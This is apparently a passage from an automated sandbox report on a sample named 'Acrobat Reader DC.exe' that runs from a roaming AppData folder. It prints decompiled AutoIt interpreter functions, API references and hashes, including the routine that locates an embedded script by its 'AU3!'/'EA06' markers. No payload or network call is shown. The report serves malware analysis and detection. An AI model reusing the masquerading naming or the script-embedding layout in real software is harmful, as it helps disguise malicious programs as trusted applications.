													goto L15;
												} else {
													__eax = CreatePopupMenu();
													_pop(__esi);
													 *0x4a8710 = __eax;
													__eax = 0;
													__eflags = 0;
													_pop(__ebx);
													return 0;
												}
												goto L35;
											case 1:
												KillTimer(_t38, 1);
												E00401000(0x4a8710);
												PostQuitMessage(0);
												__eflags = 0;
												return 0;
												goto L35;
											case 2:
												goto L3;
											case 3:
												__eax = _a12;
												__ecx = _a12;
												__edx = __ax & 0x0000ffff;
												__eax =  *0x497514;
												__ecx = _a12 >> 0x10;
												__eax = MoveWindow( *0x497514, 0, 0, __ax & 0x0000ffff, _a12 >> 0x10, 1);
												goto L15;
											case 4:
												 *0x497514 = SetFocus( *0x497514);
												goto L15;
										}
									}
								}
							} else {
								__eflags = _t52 - 0x312;
								if(__eflags > 0) {
									__eflags = _t52 - 0x401;
									if(_t52 != 0x401) {
										goto L3;
									} else {
										E00468B0E(_t67, 0x4a8710, _t38, _a12);
										goto L15;
									}
								} else {
									if(__eflags == 0) {
										__eflags =  *0x4974ec;
										if(__eflags == 0) {
											E004370F4( &_a8, __eflags,  &_a8);
										}
										goto L4;
									} else {
										__eflags = _t52 - 0x11;
										if(_t52 == 0x11) {
											asm("sbb eax, eax");
											 *0x4974f0 =  ~(_a12 & 0x80000000) + 4;
											 *0x4974e6 = 0;
											E0040F190(_t43, 0x4a8178);
											E00401A50(0x4a8178, _t49, __eflags, _t67);
											_t38 = _a4;
											goto L4;
										} else {
											__eflags = _t52 - 0x111;
											if(__eflags != 0) {
												goto L3;
											} else {
												_t36 = E0045FD57(__eflags, _t67, 0x4a8710, _a8, _a12);
												__eflags = _t36 - 1;
												if(_t36 != 1) {
													goto L4;
												} else {
													L15:
													__eflags = 0;
													return 0;
												}
											}
										}
									}
								}
							}
						}
					} else {
						L3:
						if(_t52 ==  *0x4a95e8) {
							__eflags =  *0x4974ea - 1;
							if( *0x4974ea == 1) {
								E00401000(0x4a8710);
								E0040E0C0(0x4a8710, _t67);
							}
						}
						L4:
						_t22 = DefWindowProcW(_t38, _t52, _a8, _a12); // executed
						return _t22;
					}
				}
				L35:
			}













                                  0x00401100
                                  0x00401107
                                  0x00401111
                                  0x0040117e
                                  0x00401180
                                  0x00000000
                                  0x00401182
                                  0x00000000
                                  0x00401182
                                  0x00401113
                                  0x00401113
                                  0x00401119
                                  0x00401144
                                  0x0040114a
                                  0x0040118e
                                  0x00000000
                                  0x0040114c
                                  0x0040114c
                                  0x0040114f
                                  0x0040119d
                                  0x0042afb9
                                  0x0042afc0
                                  0x00000000
                                  0x004011a3
                                  0x004011a3
                                  0x004011a6
                                  0x004011a9
                                  0x00000000
                                  0x004011af
                                  0x004011af
                                  0x00000000
                                  0x004011e5
                                  0x004011f0
                                  0x004011f6
                                  0x004011fd
                                  0x00401202
                                  0x00000000
                                  0x00401204
                                  0x00401204
                                  0x0040120a
                                  0x0040120b
                                  0x00401210
                                  0x00401210
                                  0x00401212
                                  0x00401216
                                  0x00401216
                                  0x00000000
                                  0x00000000
                                  0x004011b9
                                  0x004011c4
                                  0x004011cb
                                  0x004011d1
                                  0x004011d8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042af90
                                  0x0042af95
                                  0x0042af97
                                  0x0042af9a
                                  0x0042af9f
                                  0x0042afa9
                                  0x00000000
                                  0x00000000
                                  0x0042af85
                                  0x00000000
                                  0x00000000
                                  0x004011af
                                  0x004011a9
                                  0x00401151
                                  0x00401151
                                  0x00401157
                                  0x00401219
                                  0x0040121f
                                  0x00000000
                                  0x00401225
                                  0x0042b068
                                  0x00000000
                                  0x0042b068
                                  0x0040115d
                                  0x0040115d
                                  0x0042b01d
                                  0x0042b024
                                  0x0042b02e
                                  0x0042b02e
                                  0x00000000
                                  0x00401163
                                  0x00401163
                                  0x00401166
                                  0x0042aff3
                                  0x0042affd
                                  0x0042b002
                                  0x0042b009
                                  0x0042b010
                                  0x0042b015
                                  0x00000000
                                  0x0040116c
                                  0x0040116c
                                  0x00401172
                                  0x00000000
                                  0x00401174
                                  0x0042afd7
                                  0x0042afdc
                                  0x0042afde
                                  0x00000000
                                  0x0042afe4
                                  0x00401193
                                  0x00401193
                                  0x0040119a
                                  0x0040119a
                                  0x0042afde
                                  0x00401172
                                  0x00401166
                                  0x0040115d
                                  0x00401157
                                  0x0040114f
                                  0x00401120
                                  0x00401120
                                  0x00401126
                                  0x0042b038
                                  0x0042b03f
                                  0x0042b04a
                                  0x0042b054
                                  0x0042b054
                                  0x0042b03f
                                  0x0040112c
                                  0x00401136
                                  0x00401141
                                  0x00401141
                                  0x00401119
                                  0x00000000

                                  APIs
                                  • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                  • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                  • PostQuitMessage.USER32(00000000), ref: 004011CB
                                  • SetTimer.USER32 ref: 004011E5
                                  • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                  • CreatePopupMenu.USER32(?,?,?,004010F8,?,?,?), ref: 00401204
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                  • String ID: TaskbarCreated
                                  • API String ID: 129472671-2362178303
                                  • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                  • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                  • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                  • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F5C0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 125COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1316 40f5c0-40f5cf call 422240 1319 40f5d0-40f5e8 1316->1319 1319->1319 1320 40f5ea-40f613 call 413650 call 410e60 1319->1320 1325 40f614-40f633 call 414d04 1320->1325 1328 40f691 1325->1328 1329 40f635-40f63c 1325->1329 1330 40f696-40f69c 1328->1330 1331 40f660-40f674 call 4150d1 1329->1331 1332 40f63e 1329->1332 1336 40f679-40f67c 1331->1336 1333 40f640 1332->1333 1335 40f642-40f650 1333->1335 1337 40f652-40f655 1335->1337 1338 40f67e-40f68c 1335->1338 1336->1325 1341 40f65b-40f65e 1337->1341 1342 425d1e-425d3e call 4150d1 call 414d04 1337->1342 1339 40f68e-40f68f 1338->1339 1340 40f69f-40f6ad 1338->1340 1339->1337 1343 40f6b4-40f6c2 1340->1343 1344 40f6af-40f6b2 1340->1344 1341->1331 1341->1333 1352 425d43-425d5f call 414d30 1342->1352 1347 425d16 1343->1347 1348 40f6c8-40f6d6 1343->1348 1344->1337 1347->1342 1350 425d05-425d0b 1348->1350 1351 40f6dc-40f6df 1348->1351 1350->1335 1353 425d11 1350->1353 1351->1337 1352->1330 1353->1347
                                  C-Code - Quality: 88%
                                  			E0040F5C0(intOrPtr* _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v65572;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t53;
				void* _t58;
				signed int _t59;
				signed int _t70;
				void* _t80;
				void* _t87;
				void* _t92;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;

				E00422240(0x10020);
				_t53 = 0;
				do {
					_t1 = _t53 + 0x4921a0; // 0xbe4b48a3
					_t2 = _t53 + 0x492198; // 0xa534c99
					 *((char*)(_t97 + _t53 - 0x20)) =  *_t1;
					 *((char*)(_t97 + _t53 - 0x18)) =  *_t2;
					_t53 = _t53 + 1;
				} while (_t53 < 8);
				E00413650( &_v12, "AU3!");
				E00410E60( &_v20,  &_v12, 4);
				_t99 = _t98 + 0x14;
				_push(_t73);
				_v16 = 0;
				while(1) {
					_t58 = E00414D04( &_v65572, 1, 0x10000,  *_a4); // executed
					_t100 = _t99 + 0x10;
					if(_t58 < 0x18) {
						break;
					}
					_t92 = _t58;
					_t13 = _t92 - 0x14; // -20
					_t95 = _t13;
					if(_t95 <= 0) {
						L10:
						_t22 = _t92 - 0x14; // -20
						_push(1);
						_push(0xffffffec);
						_push( *_a4);
						_v16 = _v16 + _t22;
						E004150D1(_t73, _v16 + _t22, _t92, _t95, _t110); // executed
						_t99 = _t100 + 0xc;
						continue;
					} else {
						_t87 = 0;
						do {
							_t80 = 0;
							while(1) {
								_t73 =  *((intOrPtr*)(_t97 + _t80 - 0x20));
								if( *((intOrPtr*)(_t97 + _t80 - 0x20)) !=  *((intOrPtr*)(_t97 + _t80 + _t87 - 0x10020))) {
									break;
								}
								_t73 =  *((intOrPtr*)(_t97 + _t80 - 0x1f));
								__eflags =  *((intOrPtr*)(_t97 + _t80 - 0x1f)) -  *((intOrPtr*)(_t97 + _t80 + _t87 - 0x1001f));
								if(__eflags == 0) {
									_t73 =  *((intOrPtr*)(_t97 + _t80 - 0x1e));
									__eflags =  *((intOrPtr*)(_t97 + _t80 - 0x1e)) -  *((intOrPtr*)(_t97 + _t80 + _t87 - 0x1001e));
									if(__eflags == 0) {
										_t73 =  *((intOrPtr*)(_t97 + _t80 - 0x1d));
										__eflags =  *((intOrPtr*)(_t97 + _t80 - 0x1d)) -  *((intOrPtr*)(_t97 + _t80 + _t87 - 0x1001d));
										if(__eflags != 0) {
											_t80 = _t80 + 3;
											break;
										} else {
											_t73 =  *((intOrPtr*)(_t97 + _t80 - 0x1c));
											__eflags =  *((intOrPtr*)(_t97 + _t80 - 0x1c)) -  *((intOrPtr*)(_t97 + _t80 + _t87 - 0x1001c));
											if(__eflags == 0) {
												_t80 = _t80 + 5;
												__eflags = _t80 - 0x14;
												if(__eflags < 0) {
													continue;
												} else {
													break;
												}
											} else {
												_t80 = _t80 + 4;
												break;
											}
										}
									} else {
										_t80 = _t80 + 2;
										break;
									}
								} else {
									_t80 = _t80 + 1;
									break;
								}
								L24:
							}
							if(_t80 == 0x14) {
								_t96 = _a4;
								_t47 = _t87 + 0x14; // 0x14
								_push(0);
								_push(_v16 + _t47);
								_push( *_a4); // executed
								E004150D1(_t73,  *_a4, _t92, _a4, __eflags); // executed
								E00414D04( &_v12, 1, 4,  *_t96); // executed
								_v8 = 0;
								_t70 = E00414D30( &_v12, "EA06");
								asm("sbb eax, eax");
								_t59 =  ~_t70 & 0x00000004;
							} else {
								goto L9;
							}
							goto L14;
							L9:
							_t87 = _t87 + 1;
							_t110 = _t87 - _t95;
						} while (_t87 < _t95);
						goto L10;
					}
					L14:
					return _t59;
					goto L24;
				}
				_t59 = 3;
				goto L14;
			}
























                                  0x0040f5c8
                                  0x0040f5cd
                                  0x0040f5d0
                                  0x0040f5d0
                                  0x0040f5d6
                                  0x0040f5dc
                                  0x0040f5e0
                                  0x0040f5e4
                                  0x0040f5e5
                                  0x0040f5f3
                                  0x0040f602
                                  0x0040f607
                                  0x0040f60a
                                  0x0040f60c
                                  0x0040f614
                                  0x0040f628
                                  0x0040f62d
                                  0x0040f633
                                  0x00000000
                                  0x00000000
                                  0x0040f635
                                  0x0040f637
                                  0x0040f637
                                  0x0040f63c
                                  0x0040f660
                                  0x0040f666
                                  0x0040f66c
                                  0x0040f66e
                                  0x0040f670
                                  0x0040f671
                                  0x0040f674
                                  0x0040f679
                                  0x00000000
                                  0x0040f63e
                                  0x0040f63e
                                  0x0040f640
                                  0x0040f640
                                  0x0040f642
                                  0x0040f642
                                  0x0040f650
                                  0x00000000
                                  0x00000000
                                  0x0040f67e
                                  0x0040f685
                                  0x0040f68c
                                  0x0040f69f
                                  0x0040f6a6
                                  0x0040f6ad
                                  0x0040f6b4
                                  0x0040f6bb
                                  0x0040f6c2
                                  0x00425d16
                                  0x00000000
                                  0x0040f6c8
                                  0x0040f6c8
                                  0x0040f6cf
                                  0x0040f6d6
                                  0x00425d05
                                  0x00425d08
                                  0x00425d0b
                                  0x00000000
                                  0x00425d11
                                  0x00000000
                                  0x00425d11
                                  0x0040f6dc
                                  0x0040f6dc
                                  0x00000000
                                  0x0040f6dc
                                  0x0040f6d6
                                  0x0040f6af
                                  0x0040f6af
                                  0x00000000
                                  0x0040f6af
                                  0x0040f68e
                                  0x0040f68e
                                  0x00000000
                                  0x0040f68e
                                  0x00000000
                                  0x0040f68c
                                  0x0040f655
                                  0x00425d21
                                  0x00425d24
                                  0x00425d2a
                                  0x00425d2c
                                  0x00425d2d
                                  0x00425d2e
                                  0x00425d3e
                                  0x00425d4c
                                  0x00425d50
                                  0x00425d5a
                                  0x00425d5c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040f65b
                                  0x0040f65b
                                  0x0040f65c
                                  0x0040f65c
                                  0x00000000
                                  0x0040f640
                                  0x0040f696
                                  0x0040f69c
                                  0x00000000
                                  0x0040f69c
                                  0x0040f691
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __fread_nolock_fseek_memmove
                                  • String ID: AU3!$EA06
                                  • API String ID: 3969463491-2658333250
                                  • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                  • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                  • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                  • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1356 4115d7-4115df 1357 4115ee-4115f9 call 4135bb 1356->1357 1360 4115e1-4115ec call 411988 1357->1360 1361 4115fb-4115fc 1357->1361 1360->1357 1364 4115fd-41160e 1360->1364 1365 411610-41163b call 417fc0 call 41130a 1364->1365 1366 41163c-411656 call 4180af call 418105 1364->1366 1365->1366
                                  C-Code - Quality: 92%
                                  			E004115D7(void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v0;
				char _v8;
				char _v20;
				void* _t11;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__* _t16;
				void* _t26;
				void* _t27;
				void* _t29;

				_t29 = __esi;
				_t27 = __edi;
				while(1) {
					_t11 = E004135BB(_t26, _t27, _t29, _a4); // executed
					if(_t11 != 0) {
						break;
					}
					_t12 = E00411988(_a4);
					__eflags = _t12;
					if(_t12 == 0) {
						__eflags =  *0x49664c & 0x00000001;
						if(( *0x49664c & 0x00000001) == 0) {
							 *0x49664c =  *0x49664c | 0x00000001;
							__eflags =  *0x49664c;
							_push(1);
							_v8 = "bad allocation";
							E00417FC0(0x496640,  &_v8);
							 *0x496640 = 0x482a2c;
							E0041130A( *0x49664c, 0x425bee);
						}
						E004180AF( &_v20, 0x496640);
						_v20 = 0x482a2c;
						E00418105( &_v20, 0x48ceac);
						asm("int3");
						_t16 = GetModuleHandleW(L"mscoree.dll");
						__eflags = _t16;
						if(_t16 != 0) {
							_t16 = GetProcAddress(_t16, "CorExitProcess");
							__eflags = _t16;
							if(_t16 != 0) {
								return _t16->i(_v0);
							}
						}
						return _t16;
					} else {
						continue;
					}
					L11:
				}
				return _t11;
				goto L11;
			}












                                  0x004115d7
                                  0x004115d7
                                  0x004115ee
                                  0x004115f1
                                  0x004115f9
                                  0x00000000
                                  0x00000000
                                  0x004115e4
                                  0x004115ea
                                  0x004115ec
                                  0x004115fd
                                  0x0041160e
                                  0x00411610
                                  0x00411610
                                  0x00411617
                                  0x0041161f
                                  0x00411626
                                  0x00411630
                                  0x00411636
                                  0x0041163b
                                  0x00411640
                                  0x0041164e
                                  0x00411651
                                  0x00411656
                                  0x00411661
                                  0x00411667
                                  0x00411669
                                  0x00411671
                                  0x00411677
                                  0x00411679
                                  0x00000000
                                  0x0041167e
                                  0x00411679
                                  0x00411681
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004115ec
                                  0x004115fc
                                  0x00000000

                                  APIs
                                  • _malloc.LIBCMT ref: 004115F1
                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                  • std::exception::exception.LIBCMT ref: 00411626
                                  • std::exception::exception.LIBCMT ref: 00411640
                                  • __CxxThrowException@8.LIBCMT ref: 00411651
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                  • String ID: ,*H$4*H$@fI
                                  • API String ID: 615853336-1459471987
                                  • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                  • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                  • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                  • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004102B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1375 4102b0-4102c5 SHGetMalloc 1376 4102cb-4102da SHGetDesktopFolder 1375->1376 1377 425dfd-425e0e call 433244 1375->1377 1378 4102e0-41031a call 412fba 1376->1378 1379 41036b-410379 1376->1379 1387 410360-410368 1378->1387 1388 41031c-410331 SHGetPathFromIDListW 1378->1388 1379->1377 1385 41037f-410384 1379->1385 1387->1379 1389 410351-41035d 1388->1389 1390 410333-41034a call 412fba 1388->1390 1389->1387 1390->1389
                                  C-Code - Quality: 62%
                                  			E004102B0(void* __ebx, void* __edi, void* __esi) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v20;
				short _v24;
				char _v544;
				char _v1068;
				char* _t21;
				intOrPtr* _t24;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr* _t34;
				void* _t38;
				void* _t55;
				void* _t57;

				_t55 = __edi;
				_t38 = __ebx;
				_t21 =  &_v8;
				__imp__SHGetMalloc(_t21); // executed
				if(_t21 != 0) {
					L9:
					E00433244(_t55, _t38, 0x105);
					return 0;
				} else {
					_t57 = 0; // executed
					__imp__SHGetDesktopFolder( &_v12, __esi); // executed
					if(_t21 == 0) {
						E00412FBA( &_v544, __ebx, 0x104);
						_v24 = 0;
						_t29 = _v12;
						_t31 =  *((intOrPtr*)( *((intOrPtr*)( *_t29 + 0xc))))(_t29, 0, 0,  &_v544,  &_v20,  &_v16, 0); // executed
						if(_t31 == 0) {
							__imp__SHGetPathFromIDListW(_v16,  &_v1068); // executed
							_t57 = _t31;
							if(_t57 != 0) {
								E00412FBA(__edi,  &_v1068, 0x104);
								 *((short*)(__edi + 0x208)) = 0;
							}
							_t34 = _v8;
							 *((intOrPtr*)( *((intOrPtr*)( *_t34 + 0x14))))(_t34, _v16);
						}
						_t32 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t32 + 8))))(_t32);
					}
					_t24 = _v8;
					 *((intOrPtr*)( *((intOrPtr*)( *_t24 + 8))))(_t24);
					if(_t57 == 0) {
						goto L9;
					} else {
						return 1;
					}
				}
			}



















                                  0x004102b0
                                  0x004102b0
                                  0x004102b9
                                  0x004102bd
                                  0x004102c5
                                  0x00425dfd
                                  0x00425e04
                                  0x00425e0e
                                  0x004102cb
                                  0x004102d0
                                  0x004102d2
                                  0x004102da
                                  0x004102ed
                                  0x00410307
                                  0x0041030b
                                  0x00410316
                                  0x0041031a
                                  0x00410327
                                  0x0041032d
                                  0x00410331
                                  0x00410340
                                  0x0041034a
                                  0x0041034a
                                  0x00410351
                                  0x0041035e
                                  0x0041035e
                                  0x00410360
                                  0x00410369
                                  0x00410369
                                  0x0041036b
                                  0x00410374
                                  0x00410379
                                  0x00000000
                                  0x0041037f
                                  0x00410384
                                  0x00410384
                                  0x00410379

                                  APIs
                                  • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                  • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                  • _wcsncpy.LIBCMT ref: 004102ED
                                  • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                  • _wcsncpy.LIBCMT ref: 00410340
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                  • String ID: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                  • API String ID: 3170942423-3542460094
                                  • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                  • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                  • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                  • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1393 40e4c0-40e4e5 call 403350 RegOpenKeyExW 1396 427190-4271ae RegQueryValueExW 1393->1396 1397 40e4eb-40e4f0 1393->1397 1398 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 1396->1398 1399 42721a-42722a RegCloseKey 1396->1399 1404 427210-427219 call 436508 1398->1404 1405 4271f7-42720e call 402160 1398->1405 1404->1399 1405->1404
                                  C-Code - Quality: 85%
                                  			E0040E4C0(void* __esi, void* __eflags) {
				int _v8;
				void* _v12;
				char* _v20;
				void* __ebx;
				void* __edi;
				long _t23;
				long _t34;
				signed int _t37;
				int _t42;
				void* _t57;
				char* _t58;

				E00403350(__esi);
				_t23 = RegOpenKeyExW(0x80000001, L"Software\\AutoIt v3\\AutoIt", 0, 1,  &_v12); // executed
				if(_t23 == 0) {
					_t42 = 0;
					__eflags = RegQueryValueExW(_v12, L"Include", 0, 0, 0,  &_v8);
					if(__eflags == 0) {
						_push(_t57);
						_push( ~(0 | __eflags > 0x00000000) | (_v8 + 0x00000001) * 0x00000002);
						E0043652F(__eflags,  &_v20, E004115D7(_t57, __esi, __eflags));
						_t58 = _v20;
						_t55 = _v12;
						_t34 = RegQueryValueExW(_v12, L"Include", 0, 0, _t58,  &_v8);
						__eflags = _t34;
						if(_t34 == 0) {
							_t37 = _v8 >> 1;
							_v8 = _t37;
							__eflags = 0;
							 *((short*)(_t58 + _t37 * 2)) = 0;
							E00402160(__esi, _t58, _t55, _t58);
							_t42 = 1;
						}
						E00436508( &_v20);
					}
					RegCloseKey(_v12);
					return _t42;
				} else {
					return 0;
				}
			}














                                  0x0040e4c6
                                  0x0040e4dd
                                  0x0040e4e5
                                  0x004271a4
                                  0x004271ac
                                  0x004271ae
                                  0x004271c0
                                  0x004271c5
                                  0x004271d3
                                  0x004271d8
                                  0x004271db
                                  0x004271ed
                                  0x004271f3
                                  0x004271f5
                                  0x004271fa
                                  0x004271fc
                                  0x004271ff
                                  0x00427201
                                  0x00427209
                                  0x0042720e
                                  0x0042720e
                                  0x00427214
                                  0x00427219
                                  0x0042721e
                                  0x0042722a
                                  0x0040e4eb
                                  0x0040e4f0
                                  0x0040e4f0

                                  APIs
                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                  • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
